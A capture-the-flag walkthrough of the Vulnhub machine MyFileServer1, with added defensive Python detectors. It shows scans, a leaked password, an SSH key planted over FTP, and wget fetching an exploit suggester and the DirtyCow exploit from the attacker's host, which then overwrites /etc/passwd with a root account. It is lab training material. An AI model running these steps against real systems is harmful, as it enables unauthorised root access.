[VLN] MyFileServer1

Today we are going to hack the Vulnhub machine called MyFileServer1. You can download it from the following link: https://www.vulnhub.com/entry/my-file-server-1,432/
  • Enumeration
    We start with an nmap scan to see which ports are open.
    sml@Cassandra:~$ nmap -p- -A 192.168.1.85
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-27 11:03 CET
    Nmap scan report for fileserver.home (192.168.1.85)
    Host is up (0.00055s latency).
    Not shown: 64523 filtered ports, 1004 closed ports
    PORT      STATE SERVICE     VERSION
    21/tcp    open  ftp         vsftpd 3.0.2
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    |_drwxrwxrwx    3 0        0              16 Feb 19 07:48 pub [NSE: writeable]
    | ftp-syst:
    |   STAT:
    | FTP server status:
    |      Connected to ::ffff:192.168.1.148
    |      Logged in as ftp
    |      TYPE: ASCII
    |      No session bandwidth limit
    |      Session timeout in seconds is 300
    |      Control connection is plain text
    |      Data connections will be plain text
    |      At session startup, client count was 3
    |      vsFTPd 3.0.2 - secure, fast, stable
    |_End of status
    22/tcp    open  ssh         OpenSSH 7.4 (protocol 2.0)
    | ssh-hostkey:
    |   2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA)
    |   256 b8:db:2c:ca:e2:70:c3:eb:9a:a8:cc:0e:a2:1c:68:6b (ECDSA)
    |_  256 66:a3:1b:55:ca:c2:51:84:41:21:7f:77:40:45:d4:9f (ED25519)
    80/tcp    open  http        Apache httpd 2.4.6 ((CentOS))
    | http-methods:
    |_  Potentially risky methods: TRACE
    |_http-server-header: Apache/2.4.6 (CentOS)
    |_http-title: My File Server
    111/tcp   open  rpcbind     2-4 (RPC #100000)
    | rpcinfo:
    |   program version    port/proto  service
    |   100000  2,3,4        111/tcp   rpcbind
    |   100000  2,3,4        111/udp   rpcbind
    |   100000  3,4          111/tcp6  rpcbind
    |   100000  3,4          111/udp6  rpcbind
    |   100003  3,4         2049/tcp   nfs
    |   100003  3,4         2049/tcp6  nfs
    |   100003  3,4         2049/udp   nfs
    |   100003  3,4         2049/udp6  nfs
    |   100005  1,2,3      20048/tcp   mountd
    |   100005  1,2,3      20048/tcp6  mountd
    |   100005  1,2,3      20048/udp   mountd
    |   100005  1,2,3      20048/udp6  mountd
    |   100021  1,3,4      40143/udp   nlockmgr
    |   100021  1,3,4      44733/tcp6  nlockmgr
    |   100021  1,3,4      45664/udp6  nlockmgr
    |   100021  1,3,4      60055/tcp   nlockmgr
    |   100024  1          34834/udp   status
    |   100024  1          39810/udp6  status
    |   100024  1          44480/tcp   status
    |   100024  1          60715/tcp6  status
    |   100227  3           2049/tcp   nfs_acl
    |   100227  3           2049/tcp6  nfs_acl
    |   100227  3           2049/udp   nfs_acl
    |_  100227  3           2049/udp6  nfs_acl
    445/tcp   open  netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
    2049/tcp  open  nfs_acl     3 (RPC #100227)
    2121/tcp  open  ftp         ProFTPD 1.3.5
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    |_Can't get directory listing: ERROR
    20048/tcp open  mountd      1-3 (RPC #100005)
    Service Info: Host: FILESERVER; OS: Unix

    Host script results:
    |_clock-skew: mean: -1h50m00s, deviation: 3h10m30s, median: -1s
    | smb-os-discovery:
    |   OS: Windows 6.1 (Samba 4.9.1)
    |   Computer name: localhost
    |   NetBIOS computer name: FILESERVER\x00
    |   Domain name: \x00
    |   FQDN: localhost
    |_  System time: 2020-03-27T15:34:27+05:30
    | smb-security-mode:
    |   account_used:
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode:
    |   2.02:
    |_    Message signing enabled but not required
    | smb2-time:
    |   date: 2020-03-27T10:04:26
    |_  start_date: N/A

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 86.05 seconds
    We can see that it has many open ports, so it is time to see what information we can extract from them.
    sml@Cassandra:~$ nikto -h http://192.168.1.85
    - Nikto v2.1.6
    ---------------------------------------------------------------------------
    + Target IP:          192.168.1.85
    + Target Hostname:    192.168.1.85
    + Target Port:        80
    + Start Time:         2020-03-27 11:07:43 (GMT1)
    ---------------------------------------------------------------------------
    + Server: Apache/2.4.6 (CentOS)
    + The anti-clickjacking X-Frame-Options header is not present.
    + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
    + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
    + Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
    + Allowed HTTP Methods: OPTIONS, GET, HEAD, POST, TRACE
    + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
    + OSVDB-3092: /readme.txt: This might be interesting...
    + OSVDB-3268: /icons/: Directory indexing found.
    + OSVDB-3233: /icons/README: Apache default file found.
    + 8724 requests: 0 error(s) and 9 item(s) reported on remote host
    + End Time:           2020-03-27 11:08:36 (GMT1) (53 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested
    Nikto detects the file readme.txt; if we open http://192.168.1.85/readme.txt we find the following text:
    My Password is rootroot1
    We keep looking for more information that may be useful to us.
    sml@Cassandra:/tmp$ smbmap -H 192.168.1.85
    [+] IP: 192.168.1.85:445        Name: fileserver.home
            Disk                                            Permissions     Comment
            ----                                            -----------     -------
            print$                                          NO ACCESS       Printer Drivers
            smbdata                                         READ, WRITE     smbdata
            smbuser                                         NO ACCESS       smbuser
            IPC$                                            NO ACCESS       IPC Service (Samba 4.9.1)
    We can see that Samba has 2 shares, one called smbdata and another called smbuser.
    sml@Cassandra:/tmp$ smbmap -H 192.168.1.85 -R
    [+] IP: 192.168.1.85:445        Name: fileserver.home
            Disk                                            Permissions     Comment
            ----                                            -----------     -------
            print$                                          NO ACCESS       Printer Drivers
            smbdata                                         READ, WRITE     smbdata
            .\smbdata\*
            dr--r--r--                0 Fri Mar 27 11:23:08 2020    .
            dr--r--r--                0 Tue Feb 18 12:47:54 2020    ..
            dr--r--r--                0 Tue Feb 18 12:48:15 2020    anaconda
            dr--r--r--                0 Tue Feb 18 12:48:15 2020    audit
            fr--r--r--             6120 Tue Feb 18 12:48:16 2020    boot.log
            fr--r--r--              384 Tue Feb 18 12:48:16 2020    btmp
            fr--r--r--             4813 Tue Feb 18 12:48:16 2020    cron
            fr--r--r--            31389 Tue Feb 18 12:48:16 2020    dmesg
            fr--r--r--            31389 Tue Feb 18 12:48:16 2020    dmesg.old
            dr--r--r--                0 Tue Feb 18 12:48:16 2020    glusterfs
            fr--r--r--           292292 Tue Feb 18 12:48:16 2020    lastlog
            fr--r--r--             1982 Tue Feb 18 12:48:16 2020    maillog
            fr--r--r--           684379 Tue Feb 18 12:48:16 2020    messages
            dr--r--r--                0 Tue Feb 18 12:48:16 2020    ppp
            dr--r--r--                0 Tue Feb 18 12:48:16 2020    samba
            fr--r--r--            11937 Tue Feb 18 12:48:16 2020    secure
            fr--r--r--                0 Tue Feb 18 12:48:16 2020    spooler
            fr--r--r--                0 Tue Feb 18 12:48:16 2020    tallylog
            dr--r--r--                0 Tue Feb 18 12:48:16 2020    tuned
            fr--r--r--            25728 Tue Feb 18 12:48:17 2020    wtmp
            fr--r--r--              100 Tue Feb 18 12:48:17 2020    xferlog
            fr--r--r--            10915 Tue Feb 18 12:48:17 2020    yum.log
            fr--r--r--             3906 Wed Feb 19 08:46:38 2020    sshd_config
            .\smbdata\anaconda\*
            dr--r--r--                0 Tue Feb 18 12:48:15 2020    .
            dr--r--r--                0 Fri Mar 27 11:23:08 2020    ..
            fr--r--r--            21532 Tue Feb 18 12:48:15 2020    anaconda.log
            fr--r--r--            66090 Tue Feb 18 12:48:15 2020    syslog
            fr--r--r--            22750 Tue Feb 18 12:48:15 2020    anaconda.xlog
            fr--r--r--            25353 Tue Feb 18 12:48:15 2020    anaconda.program.log
            fr--r--r--           123159 Tue Feb 18 12:48:15 2020    anaconda.packaging.log
            fr--r--r--            95767 Tue Feb 18 12:48:15 2020    anaconda.storage.log
            fr--r--r--             1894 Tue Feb 18 12:48:15 2020    anaconda.ifcfg.log
            fr--r--r--                0 Tue Feb 18 12:48:15 2020    ks-script-JI8Xco.log
            fr--r--r--                0 Tue Feb 18 12:48:15 2020    ks-script-vT7qk9.log
            .\smbdata\audit\*
            dr--r--r--                0 Tue Feb 18 12:48:15 2020    .
            dr--r--r--                0 Fri Mar 27 11:23:08 2020    ..
            fr--r--r--           840450 Tue Feb 18 12:48:16 2020    audit.log
            .\smbdata\samba\*
            dr--r--r--                0 Tue Feb 18 12:48:16 2020    .
            dr--r--r--                0 Fri Mar 27 11:23:08 2020    ..
            dr--r--r--                0 Tue Feb 18 12:48:16 2020    old
            fr--r--r--              168 Tue Feb 18 12:48:16 2020    log.smbd
            dr--r--r--                0 Tue Feb 18 12:48:16 2020    cores
            .\smbdata\samba\cores\*
            dr--r--r--                0 Tue Feb 18 12:48:16 2020    .
            dr--r--r--                0 Tue Feb 18 12:48:16 2020    ..
            dr--r--r--                0 Tue Feb 18 12:48:16 2020    smbd
            .\smbdata\tuned\*
            dr--r--r--                0 Tue Feb 18 12:48:16 2020    .
            dr--r--r--                0 Fri Mar 27 11:23:08 2020    ..
            fr--r--r--            15722 Tue Feb 18 12:48:16 2020    tuned.log
            smbuser                                         NO ACCESS       smbuser
            IPC$                                            NO ACCESS       IPC Service (Samba 4.9.1)
    After reviewing all the ports, the only things we have are a possible user called smbuser and the password rootroot1. We try them on several services and see that the FTP server accepts the credentials smbuser/rootroot1.
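The enumeration above hinges on a share (smbdata) that a null session can read and write, exposing the host's log directory and sshd_config. The following is an added audit helper, not code from the original post: it parses the share table smbmap prints when run without credentials and returns every share that is exposed anonymously, with a separate list of the writable ones. The sample input is the smbmap output shown earlier on this page; the function names are my own.

```python
"""Parse an smbmap null-session share listing and flag anonymous exposure.

Added example for this write-up (not part of the original post).
SAMPLE_SMBMAP is the smbmap output shown on the page, reproduced here so
the script runs offline."""
import re
from typing import List, Tuple

SAMPLE_SMBMAP = """\
[+] IP: 192.168.1.85:445        Name: fileserver.home
        Disk                                            Permissions     Comment
        ----                                            -----------     -------
        print$                                          NO ACCESS       Printer Drivers
        smbdata                                         READ, WRITE     smbdata
        smbuser                                         NO ACCESS       smbuser
        IPC$                                            NO ACCESS       IPC Service (Samba 4.9.1)
"""

# One line per share: name, permission keyword, free-text comment.
# smbmap uses exactly these permission strings.
SHARE_RE = re.compile(
    r"^\s*(?P<share>\S+)\s+"
    r"(?P<perms>NO ACCESS|READ ONLY|WRITE ONLY|READ, WRITE)\s*"
    r"(?P<comment>.*)$"
)


def parse_shares(text: str) -> List[Tuple[str, str, str]]:
    """Return (share, permissions, comment) for every share line found.
    Header and separator lines do not match the permission keywords and
    are skipped."""
    shares = []
    for line in text.splitlines():
        m = SHARE_RE.match(line)
        if m:
            shares.append((m["share"], m["perms"], m["comment"].strip()))
    return shares


def anonymous_exposure(text: str) -> List[Tuple[str, str]]:
    """Shares a null session can read or write: these need a reason to exist."""
    return [(s, p) for s, p, _ in parse_shares(text) if p != "NO ACCESS"]


def writable_anonymously(text: str) -> List[str]:
    """Subset of the above that an unauthenticated client can modify."""
    return [s for s, p in anonymous_exposure(text) if "WRITE" in p]


if __name__ == "__main__":
    for share, perms in anonymous_exposure(SAMPLE_SMBMAP):
        print(f"anonymous {perms:<11} {share}")
```

On this box the helper reports smbdata as both readable and writable without credentials. On the Samba side the corresponding hardening is to set guest ok = no on the share (and map to guest = Never globally) so a null session gets NO ACCESS, and to keep log directories out of any share at all, since files such as secure, audit.log and sshd_config are exactly what an attacker reads to find usernames and login policy.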
  • Low shell
    sml@Cassandra:~$ ftp 192.168.1.85
    Connected to 192.168.1.85.
    220 (vsFTPd 3.0.2)
    Name (192.168.1.85:sml): smbuser
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    When we log in to the FTP server as smbuser we see that we are apparently in that user's home directory, so we copy our SSH public key (id_rsa.pub) into a file called authorized_keys and upload it over FTP into smbuser's .ssh folder, first creating the .ssh folder over FTP as shown below.
    sml@Cassandra:~$ cp .ssh/id_rsa.pub authorized_keys
    sml@Cassandra:~$ ftp 192.168.1.85
    Connected to 192.168.1.85.
    220 (vsFTPd 3.0.2)
    Name (192.168.1.85:sml): smbuser
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> mkdir .ssh
    257 "/home/smbuser/.ssh" created
    ftp> cd .ssh
    250 Directory successfully changed.
    ftp> put authorized_keys
    local: authorized_keys remote: authorized_keys
    200 PORT command successful. Consider using PASV.
    150 Ok to send data.
    226 Transfer complete.
    567 bytes sent in 0.00 secs (22.5306 MB/s)
    Once that is done we connect over SSH :)
    sml@Cassandra:~$ ssh smbuser@192.168.1.85
    ##############################################################################################
    #                              Armour Infosec                                                #
    #                   --------- www.armourinfosec.com ------------                             #
    #                              My File Server - 1                                            #
    #                   Designed By :- Akanksha Sachin Verma                                     #
    #                   Twitter :- @akankshavermasv                                              #
    ##############################################################################################
    Last login: Fri Mar 27 17:20:37 2020 from cassandra.home
    [smbuser@fileserver ~]$ id
    uid=1000(smbuser) gid=1000(smbuser) grupos=1000(smbuser)
    [smbuser@fileserver ~]$
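The foothold above works because the FTP login lands in a writable home directory, so a plain file upload becomes an SSH credential. vsftpd records every transfer in its xferlog, which makes this easy to catch after the fact. The following detection helper is an added example, not code from the original post: it parses xferlog records and flags uploads that land under a .ssh directory or overwrite a shell start-up file. The log lines are constructed to resemble what vsftpd would have written for the session on this page (only the path and the username come from the page); the function names are my own.

```python
"""Flag FTP uploads that plant SSH keys or shell start-up files.

Added example for this write-up (not part of the original post).
SAMPLE_XFERLOG is constructed; vsftpd's xferlog format is:
  <timestamp 5 tokens> transfer-time remote-host size filename
  transfer-type special-action direction access-mode user service
  auth-method auth-user-id completion-status"""
import posixpath
from dataclasses import dataclass
from typing import List, Optional

SAMPLE_XFERLOG = """\
Fri Mar 27 11:03:10 2020 1 192.168.1.148 16 /pub/notes.txt a _ o a ftp ftp 0 * c
Fri Mar 27 17:19:58 2020 1 192.168.1.148 567 /home/smbuser/.ssh/authorized_keys b _ i r smbuser ftp 0 * c
Fri Mar 27 17:25:02 2020 1 192.168.1.148 2048 /home/smbuser/report final.pdf b _ i r smbuser ftp 0 * c
"""

# Files an FTP upload should never touch: anything under .ssh, plus the
# start-up files a shell executes on the user's next login.
SENSITIVE_BASENAMES = {"authorized_keys", ".bashrc", ".bash_profile", ".profile"}


@dataclass
class Transfer:
    when: str
    remote_host: str
    size: int
    path: str
    direction: str     # 'i' upload, 'o' download, 'd' delete
    access_mode: str   # 'a' anonymous, 'g' guest, 'r' real user
    user: str


def parse_xferlog_line(line: str) -> Optional[Transfer]:
    """Parse one xferlog record. File names may contain spaces, so the
    fixed fields are taken from both ends and the name is what remains."""
    t = line.split()
    if len(t) < 18:          # 5 + 3 + at least 1 name token + 9 trailing fields
        return None
    when = " ".join(t[:5])
    remote_host, size = t[6], int(t[7])
    tail = t[-9:]            # type, special, direction, mode, user, service, auth, auth-id, status
    path = " ".join(t[8:-9])
    return Transfer(when, remote_host, size, path, tail[2], tail[3], tail[4])


def suspicious_uploads(log_text: str) -> List[Transfer]:
    """Uploads ('i' direction) into .ssh or onto a shell start-up file."""
    hits = []
    for line in log_text.splitlines():
        tr = parse_xferlog_line(line)
        if tr is None or tr.direction != "i":
            continue
        if ".ssh" in tr.path.split("/") or posixpath.basename(tr.path) in SENSITIVE_BASENAMES:
            hits.append(tr)
    return hits


if __name__ == "__main__":
    for tr in suspicious_uploads(SAMPLE_XFERLOG):
        print(f"{tr.when}  {tr.user}@{tr.remote_host} uploaded {tr.path} ({tr.size} bytes)")
```

Detection is the second line of defence; the configuration fix is to keep FTP writes out of the login home altogether (a dedicated upload directory, or vsftpd's chroot_local_user=YES, which by default refuses to log a user into a writable chroot) and, on the SSH side, to point sshd_config's AuthorizedKeysFile at a root-owned location rather than the user's own ~/.ssh.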
  • Privilege Escalation
    Once inside the system we download the script[1] so that it suggests an exploit that might work on this system.
    [smbuser@fileserver ~]$ cd /tmp
    [smbuser@fileserver tmp]$ wget http://192.168.1.148/lin.sh
    --2020-03-27 17:27:52--  http://192.168.1.148/lin.sh
    Conectando con 192.168.1.148:80... conectado.
    Petición HTTP enviada, esperando respuesta... 200 OK
    Longitud: 84245 (82K) [application/octet-stream]
    Grabando a: “lin.sh”

    100%[==========================================================================================>] 84.245      --.-K/s   en 0,001s

    2020-03-27 17:27:52 (114 MB/s) - “lin.sh” guardado [84245/84245]

    [smbuser@fileserver tmp]$ sh lin.sh

    Available information:

    Kernel version: 3.10.0
    Architecture: x86_64
    Distribution: RHEL
    Distribution version: 7
    Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
    Package listing: from current OS

    Searching among:

    73 kernel space exploits
    45 user space exploits

    Possible Exploits:

    [+] [CVE-2016-5195] dirtycow

       Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
       Exposure: highly probable
       Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},[ RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7} ],ubuntu=16.04|14.04|12.04
       Download URL: https://www.exploit-db.com/download/40611
       Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

    [+] [CVE-2016-5195] dirtycow 2

       Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
       Exposure: highly probable
       Tags: debian=7|8,[ RHEL=5|6|7 ],ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
       Download URL: https://www.exploit-db.com/download/40839
       ext-url: https://www.exploit-db.com/download/40847.cpp
       Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

    [+] [CVE-2017-1000367] Sudoer-to-root

       Details: https://www.sudo.ws/alerts/linux_tty.html
       Exposure: probable
       Tags: [ RHEL=7 ]{sudo:1.8.6p7}
       Download URL: https://www.qualys.com/2017/05/30/cve-2017-1000367/linux_sudo_cve-2017-1000367.c
       Comments: Needs to be sudoer. Works only on SELinux enabled systems

    --SNIP--
    It suggests several, so we are going to use[2] [CVE-2016-5195] dirtycow 2.
    [smbuser@fileserver tmp]$ wget http://192.168.1.148/40839.c
    --2020-03-27 17:30:44--  http://192.168.1.148/40839.c
    Conectando con 192.168.1.148:80... conectado.
    Petición HTTP enviada, esperando respuesta... 200 OK
    Longitud: 5006 (4,9K) [application/octet-stream]
    Grabando a: “40839.c”

    100%[==========================================================================================>] 5.006       --.-K/s   en 0s

    2020-03-27 17:30:44 (756 MB/s) - “40839.c” guardado [5006/5006]

    [smbuser@fileserver tmp]$ mv 40839.c dirty.c
    [smbuser@fileserver tmp]$ gcc -pthread dirty.c -o dirty -lcrypt
    [smbuser@fileserver tmp]$ ./dirty
    /etc/passwd successfully backed up to /tmp/passwd.bak
    Please enter the new password:
    Complete line:
    firefart:fiWZ83NyER86M:0:0:pwned:/root:/bin/bash

    mmap: 7f5c984d8000
    Once the exploit has run, we open another SSH connection (in parallel) to log in as firefart and obtain root privileges.
    sml@Cassandra:~$ ssh smbuser@192.168.1.85
    [smbuser@fileserver ~]$ su firefart
    Contraseña:
    [firefart@fileserver smbuser]# id
    uid=0(firefart) gid=0(root) grupos=0(root)
    [firefart@fileserver smbuser]# cd /root
    [firefart@fileserver ~]# ls
    proof.txt
    [firefart@fileserver ~]# cat proof.txt
    Best of Luck
    af52e0163b03cbf7c6dd146351594a43
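The exploit's footprint is visible in the "Complete line" it prints: a second uid-0 account, with a password hash stored directly in /etc/passwd instead of /etc/shadow and root's home directory as its own. Both are conditions that never occur on a correctly administered host, so a file-integrity or audit job can flag them. The following is an added example, not code from the original post: it parses passwd-format content and reports those conditions. The sample content is constructed; only the firefart line mirrors the one the exploit printed above, and the function names are my own.

```python
"""Audit /etc/passwd content for the traces a DirtyCow-style passwd
overwrite leaves behind.

Added example for this write-up (not part of the original post).
SAMPLE_PASSWD is constructed; the firefart line is the one shown on the page."""
from typing import Dict, List

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
smbuser:x:1000:1000::/home/smbuser:/bin/bash
firefart:fiWZ83NyER86M:0:0:pwned:/root:/bin/bash
"""

FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")

# Values a passwd field legitimately holds when the real hash lives in
# /etc/shadow or the account is locked.
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}


def parse_passwd(text: str) -> List[Dict[str, str]]:
    """One dict per well-formed 7-field line; comments and junk are skipped."""
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != len(FIELDS):
            continue
        entries.append(dict(zip(FIELDS, f)))
    return entries


def passwd_findings(text: str) -> List[str]:
    """Human-readable findings, one per anomaly, in file order."""
    findings = []
    for e in parse_passwd(text):
        if e["uid"] == "0" and e["name"] != "root":
            findings.append(f"{e['name']}: extra uid 0 account")
        if e["passwd"] == "":
            findings.append(f"{e['name']}: empty password field (no password required)")
        elif e["passwd"] not in SHADOWED_OR_LOCKED:
            findings.append(f"{e['name']}: password hash stored in /etc/passwd")
        if e["home"] == "/root" and e["name"] != "root":
            findings.append(f"{e['name']}: home directory is /root")
    return findings


if __name__ == "__main__":
    for finding in passwd_findings(SAMPLE_PASSWD):
        print(finding)
```

Catching the modified passwd file is damage control; the actual fix for CVE-2016-5195 is the vendor kernel update, and the Red Hat script linked in the suggester output above is the reference for which RHEL/CentOS 7 kernel builds are affected.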
  • End
    And with this we are root on the machine :)

    [1] https://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh
    [2] https://www.exploit-db.com/exploits/40839